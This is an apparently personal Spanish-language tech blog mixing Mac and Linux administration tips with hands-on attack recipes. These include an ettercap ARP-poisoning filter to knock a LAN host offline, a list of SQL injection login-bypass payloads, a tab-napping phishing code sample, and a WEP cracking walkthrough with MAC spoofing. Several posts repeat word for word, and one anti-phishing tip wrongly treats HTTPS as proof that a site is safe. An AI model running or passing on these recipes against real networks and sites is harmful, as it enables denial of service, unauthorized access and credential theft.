--------------------------------------- Cautivo en las selvas de occidente te trajeron a Roma, esclavo, te dieron el oficio de herrero y haces cadenas. El hierro al rojo que sacas de los hornos lo puedes moldear como quieras, puedes hacer espadas para que tus paisanos rompan sus cadenas, pero tu, ese esclavo, haces cadenas, mas cadenas. Joseba Sarrionaindia. ---------------------------------------
martes, 10 de diciembre de 2013
Buscador del fabricante de una tarjeta ethernet/wifi/Bluetooth por dirección MAC
En http://www.coffer.com/mac_find/ encontramos un buscador del fabricante de la tarjeta ethernet, wifi o bluetooth por la dirección MAC.
lunes, 30 de abril de 2012
Captura de foto de la webcam en Macos X desde Terminal
ImageSnap te permite capturar fotos de una cámara iSight u otra fuente de vídeo. Puede que recuerde a la herramienta isightcapture.
Copia imagesnap en el directorio donde quieras dejar las imagenes y llamalo con
$ ./imagesnap nombrearchivo.jpg.
Para comprobar que funciona en tu macquina puedes listar las webcam con el la opcion -l del comando:
$ imageSnap -l
Aqui todas las opciones:
USAGE: imagesnap [options] [filename]
Version: 0.2.5
Captures an image from a video device and saves it in a file.
If no device is specified, the system default will be used.
If no filename is specfied, snapshot.jpg will be used.
Supported image types: JPEG, TIFF, PNG, GIF, BMP
-h This help message
-v Verbose mode
-l List available video devices
-t x.xx Take a picture every x.xx seconds
-q Quiet mode. Do not output any text
-w x.xx Warmup. Delay snapshot x.xx seconds after turning on camera
-d device Use named video device
miércoles, 11 de abril de 2012
Comando desde Terminal para ver configuracion del sistema.
Con el comando system_profiler desde una shell de la Terminal de macos x podremos ver la configuración de hardware y red de la máquina. Útil si estamos conectados en remoto desde una consola.
lunes, 26 de marzo de 2012
ISP's por paises.
En la web http://www.ostamyy.com/ podemos encontrar una lista de compañías que ofrecen conexión a internet ordenadas por paises.
http://www.ostamyy.com/ISPs/
http://www.ostamyy.com/ISPs/
sábado, 3 de marzo de 2012
DoS trafico de red en LAN con filtro ettercap
Primero se crea el filtro con un editor de texto
if (ip.src=="ip objetivo" || ip.dst=="ip objetivo) {
drop();
kill();
msg("Denegacion\n");
}
Guardamos el filtro con la extension .eff
Compilamos en filtro para ettercap con el comando
etterfilter nombrearchivo.eff -o nombrearchivo.ef
Una vez creado se lanza desde ettercap con el comando
ettercap -T -q -F nombrearchivo.ef -M ARP /ip objetivo/ //
Los paquetes enviados a la ip objetivo los recibira nuestra maquina que los desechara inutilizando la conexion de red de la maquina objetivo.
if (ip.src=="ip objetivo" || ip.dst=="ip objetivo) {
drop();
kill();
msg("Denegacion\n");
}
Guardamos el filtro con la extension .eff
Compilamos en filtro para ettercap con el comando
etterfilter nombrearchivo.eff -o nombrearchivo.ef
Una vez creado se lanza desde ettercap con el comando
ettercap -T -q -F nombrearchivo.ef -M ARP /ip objetivo/ //
Los paquetes enviados a la ip objetivo los recibira nuestra maquina que los desechara inutilizando la conexion de red de la maquina objetivo.
martes, 28 de febrero de 2012
Acceso de lectura y escritura para las particiones NTFS en mac os x SnowLeopard
Desde la terminal:
diskutil info /Volumes/NOMBRE_DEL_DISCO
Deberemos copiar el UUID que nos devuelve el comando. Lo siguiente es comprobar si el fichero /etc/fstab existe
$ ls /etc/ | grep fstab
si existe, haremos una copia de seguridad
$ cp /etc/fstab ~/Desktop/
editamos el fichero con:
$ sudo vim /etc/fstab
y añadimos la línea
UUID=uuid_del_disco none ntfs rw
salvamos los cambios y reiniciamos. Ahora podremos escribir sobre una partición NTFS.
Visto y medio fusilado de http://comandogum.com/2010/02/snowleopard-permite-la-escritura-sobre-discos-con-formato-ntfs.gum.html
diskutil info /Volumes/NOMBRE_DEL_DISCO
Deberemos copiar el UUID que nos devuelve el comando. Lo siguiente es comprobar si el fichero /etc/fstab existe
$ ls /etc/ | grep fstab
si existe, haremos una copia de seguridad
$ cp /etc/fstab ~/Desktop/
editamos el fichero con:
$ sudo vim /etc/fstab
y añadimos la línea
UUID=uuid_del_disco none ntfs rw
salvamos los cambios y reiniciamos. Ahora podremos escribir sobre una partición NTFS.
Visto y medio fusilado de http://comandogum.com/2010/02/snowleopard-permite-la-escritura-sobre-discos-con-formato-ntfs.gum.html
viernes, 24 de febrero de 2012
Shell script para creación de usuario en macos x desde la Terminal
#!/bin/bash
# This script creates a user account under Mac OS X
# (tested with 10.5 and 10.6; likely works with 10.4 but not earlier)
# Written by Clinton Blackmore, based on work at
# http://serverfault.com/questions/20702
# === Typically, this is all you need to edit ===
USERNAME=joeadmin
FULLNAME="Joe Admin"
PASSWORD="hard_to_hack"
# A list of (secondary) groups the user should belong to
# This makes the difference between admin and non-admin users.
# Leave only one uncommented
#SECONDARY_GROUPS="" # for a non-admin user
SECONDARY_GROUPS="admin _lpadmin _appserveradm _appserverusr" # for an admin user
# ====
if [[ $UID -ne 0 ]]; then echo "Please run $0 as root." && exit 1; fi
# Find out the next available user ID
MAXID=$(dscl . -list /Users UniqueID | awk '{print $2}' | sort -ug | tail -1)
USERID=$((MAXID+1))
# Create the user account
dscl . -create /Users/$USERNAME
dscl . -create /Users/$USERNAME UserShell /bin/bash
dscl . -create /Users/$USERNAME RealName "$FULLNAME"
dscl . -create /Users/$USERNAME UniqueID "$USERID"
dscl . -create /Users/$USERNAME PrimaryGroupID 20
dscl . -create /Users/$USERNAME NFSHomeDirectory /Users/$USERNAME
dscl . -passwd /Users/$USERNAME $PASSWORD
# Add use to any specified groups
for GROUP in $SECONDARY_GROUPS ; do
dseditgroup -o edit -t user -a $USERNAME $GROUP
done
# Create the home directory
createhomedir -c > /dev/null
echo "Created user #$USERID: $USERNAME ($FULLNAME)"
# This script creates a user account under Mac OS X
# (tested with 10.5 and 10.6; likely works with 10.4 but not earlier)
# Written by Clinton Blackmore, based on work at
# http://serverfault.com/questions/20702
# === Typically, this is all you need to edit ===
USERNAME=joeadmin
FULLNAME="Joe Admin"
PASSWORD="hard_to_hack"
# A list of (secondary) groups the user should belong to
# This makes the difference between admin and non-admin users.
# Leave only one uncommented
#SECONDARY_GROUPS="" # for a non-admin user
SECONDARY_GROUPS="admin _lpadmin _appserveradm _appserverusr" # for an admin user
# ====
if [[ $UID -ne 0 ]]; then echo "Please run $0 as root." && exit 1; fi
# Find out the next available user ID
MAXID=$(dscl . -list /Users UniqueID | awk '{print $2}' | sort -ug | tail -1)
USERID=$((MAXID+1))
# Create the user account
dscl . -create /Users/$USERNAME
dscl . -create /Users/$USERNAME UserShell /bin/bash
dscl . -create /Users/$USERNAME RealName "$FULLNAME"
dscl . -create /Users/$USERNAME UniqueID "$USERID"
dscl . -create /Users/$USERNAME PrimaryGroupID 20
dscl . -create /Users/$USERNAME NFSHomeDirectory /Users/$USERNAME
dscl . -passwd /Users/$USERNAME $PASSWORD
# Add use to any specified groups
for GROUP in $SECONDARY_GROUPS ; do
dseditgroup -o edit -t user -a $USERNAME $GROUP
done
# Create the home directory
createhomedir -c > /dev/null
echo "Created user #$USERID: $USERNAME ($FULLNAME)"
martes, 14 de febrero de 2012
Modificar página web en modo local en nuestro navegador.
Introduciendo este código javascript se podrá modificar en el navegador la pagina web visitada. No se modifica en el servidor, solo en tu navegador.
Codigo: javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
Codigo: javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
martes, 11 de octubre de 2011
Inyecciones para pasar accessos SQLi
‘ | ; | ‘; | ‘-- | ‘or 1=1 -- | ‘ or 1=1 -- | ‘or 1=1 -- | ‘ or 1 = 1 -- | ‘ or 1=1 --
or 1=1 -- | or 1=1 -- | or 1 = 1 -- | or 1=1-- | “ or 1=1 -- | ‘ or a=a -- | “ or “a”=”a
‘) or (‘a’=’a | “) or (“a”=”a | a” or “a”=”a | a” or 1=1 -- | a’ or 1=1 -- |
a’ or ‘a’=’a | a’) or (‘a’=’a | a”) or (“a”=”a | admin’-- | ‘ or 0=0 -- | “ or 0=0 --
| or 0=0 -- | ‘ or 0=0# | “ or 0=0# | or 0=0# | )’or 1=1;
or 1=1 -- | or 1=1 -- | or 1 = 1 -- | or 1=1-- | “ or 1=1 -- | ‘ or a=a -- | “ or “a”=”a
‘) or (‘a’=’a | “) or (“a”=”a | a” or “a”=”a | a” or 1=1 -- | a’ or 1=1 -- |
a’ or ‘a’=’a | a’) or (‘a’=’a | a”) or (“a”=”a | admin’-- | ‘ or 0=0 -- | “ or 0=0 --
| or 0=0 -- | ‘ or 0=0# | “ or 0=0# | or 0=0# | )’or 1=1;
miércoles, 5 de octubre de 2011
Tab Napping
Phishing Technique: Tab Napping short code
Author: Jordan Diaz (aka Jbyte)
Website:http://jbyte-security.blogspot.com/
El "tab napping" se aprovecha de los nuevos navegadores y su sistema de varias pestañas. En ellos, sólo hace falta abrir en una ventana el navegador, y se pueden abrir varias pestañas (pulsando la combinación Control T o simplemente asiendo click) para poder navegar en varias páginas a la vez.
Este sistema reconoce qué pestañas están siendo usadas y cuales, aunque están abiertas, no han sido utilizadas en un rato. Estas últimas, cambian sin que nos demos cuenta a una de esas webs clonadas, y si tenemos la mala suerte de entrar en esa pestaña y meter nuestros datos bancarios, los delicuentes ya los tendrán para hacer con ellos lo que quieran.
¿Cómo funciona?
Este sistema instala un código Java Script en nuestro navegador, que hace que la página buena, por ejemplo la del Banco Santander, cambia a una página clonada, sin que, a priori, nos demos cuenta, cuando la pestaña en la que se muestra la web legal del Banco Santander lleve un rato inactiva.
¿Cómo evitarlo?
Podemos identificar si la web es segura o no observando la barra de direcciones. Si la URL empieza con una dirección HTTPS:// es segura.
Siempre, y repetimos, SIEMPRE, hay que fijarse que la dirección de la página de nuestro banco o de una tienda en la que queramos comprar empieza de este modo, antes de dar nuestro número de tarjeta o nuestra contraseña. Es la manera de comprobar que la página está verificada y protegida de timos como éste o como el phising.
Sencillo pero las prisas del día a día o simplemente los descuidos hacen que en ocasiones nos quedem
short Code:
<html>
<head>
<script type="text/javascript">
function setFocus(){
document.getElementById("surname").focus();
}
function sinfoco()
{var pagina = 'http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png';
//document.getElementById("searchBox").focus();
//document.location.href=pagina;
document.documentElement.innerHTML="<html><img src='http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png'></html>";
}
</script>
</head>
<body onload="setFocus();">
<form>
Name: <input type="text" id="name" size="30"><br />
Surname: <input type="text" id="surname" size="30" onblur=sinfoco()>
</form>
</body>
</html>
Solo nos queda copiar el texto y guardarlo como un archivo html y listo, nos al cambiar de pesataña nos redirigira a una web con una imagen de gmai.
FIN
http://www.exploit-db.com/papers/13953/
© Offensive Security 2011
lunes, 3 de octubre de 2011
Crack red wifi con cifrado WEP
Detenemos la interfaz de red que vamos a utilizar con el comando ifconfig:
#ifconfig <interfaz de red> down
Ponemos la interfaz en modo monitor:
#airmon-ng start <interfaz de red>
escaneamos las redes a nuestro alcance con airodump-ng
#airodump-ng <interfaz de red>
Una vez elegida una red con cifrado WEP y que tengamos buena señal paramos el airodump-ng anterior e introducimos el comando siguiente:
# airodump-ng -w <archivo de captura> --bssid <MAC del AP> -c <canal del AP victima> <interfaz de red>
Ahora realizamos el ataque al punto de acceso con cifrado WEP utilizando el comando aireplay-ng:
Con este primer comando nos asociamos al AP:
# aireplay-ng -1 10 -e <nombre del AP> -a <MAC del AP> -h <nuestra MAC> <interfaz de red>
Una vez asociado al AP :-) reinyectamos paquetes para que suba el campo #Data en la ventana del airodump-ng
# aireplay-ng -3 -b <MAC del AP> -h <nuestra MAC> <interfaz de red>
Una vez que veamos que en el campo data tenemos unos cuantos pauqtes, mas de 20.000 podemos empezar a intentar conseguir la contraseña con el comando aircrack-ng
# aircrack-ng <archivo de captura>
Es recomendable cambiar antes la mac de nuestra tarjeta wifi, para ello se puede utilizar el macchanger.
#macchanger -m <falsa MAC>
o el comando ifconfig:
#ifconfig eth0 hw ether <falsa MAC>
Nota: WEP significa Wired Equivalent Privacy o "Privacidad Equivalente a Cableado".
viernes, 30 de septiembre de 2011
Añadir texto a texto copiado que aparece al pegar.
Este código de javascript hará que se añada un texto antes y después del texto copiado de nuestra web.
<script type="text/javascript">
function addLink() {
var body_element = document.getElementsByTagName('body')[0];
var selection;
selection = window.getSelection();
var pagelinkdespues= "Este mensaje esta despues del texto copiado";
var pagelinkantes = "Este mensaje esta antes del texto copiado";
var copytext = pagelinkantes + selection+ pagelinkdespues;
var newdiv = document.createElement('div');
newdiv.style.position='absolute';
newdiv.style.left='-99999px';
body_element.appendChild(newdiv);
newdiv.innerHTML = copytext;
selection.selectAllChildren(newdiv);
window.setTimeout(function() {
body_element.removeChild(newdiv);
},0);
}
document.oncopy = addLink;
</script>
Configurar conexion wifi con wpa en Gnu-Linux
Editamos un fichero de configuraciónen /etc/wpa_supplicant/wpa_supplicant.conf especificando el tipo de clave (WPA-PSK), el nombre del SSID y la contraseña:
ctrl_interface=/var/run/wpa_supplicant
network={
ssid="aquinombreredwifi"
key_mgmt=WPA-PSK
psk="aquicontraseña"
}
Para que tenga encuenta la configuracion siempre que arranque el sistema añadiremos añadiremos a /etc/network/interfaces especificando el nombre de la red wifi sin comillas precedido de wpa-ssid y en otra linea wpa-psk y la contraseña tambien sin comillas. *
Wlan0 es la interface wireless. Para comprobar el nombre de tu interface utilizar el comando ifconfig e iwconfig:
auto wlan0
iface wlan0 inet dhcp
wpa-ssid aquinombreredwifi
wpa-psk aquicontraseña
ctrl_interface=/var/run/wpa_supplicant
network={
ssid="aquinombreredwifi"
key_mgmt=WPA-PSK
psk="aquicontraseña"
}
Para que tenga encuenta la configuracion siempre que arranque el sistema añadiremos añadiremos a /etc/network/interfaces especificando el nombre de la red wifi sin comillas precedido de wpa-ssid y en otra linea wpa-psk y la contraseña tambien sin comillas. *
Wlan0 es la interface wireless. Para comprobar el nombre de tu interface utilizar el comando ifconfig e iwconfig:
auto wlan0
iface wlan0 inet dhcp
wpa-ssid aquinombreredwifi
wpa-psk aquicontraseña
Generar HASH NT desde la shell en Linux
echo -n "password" | iconv -t utf-16le | openssl dgst -md4
Visto en twitter: @chiche via @hlixaya
Visto en twitter: @chiche via @hlixaya
Suscribirse a:
Comentarios (Atom)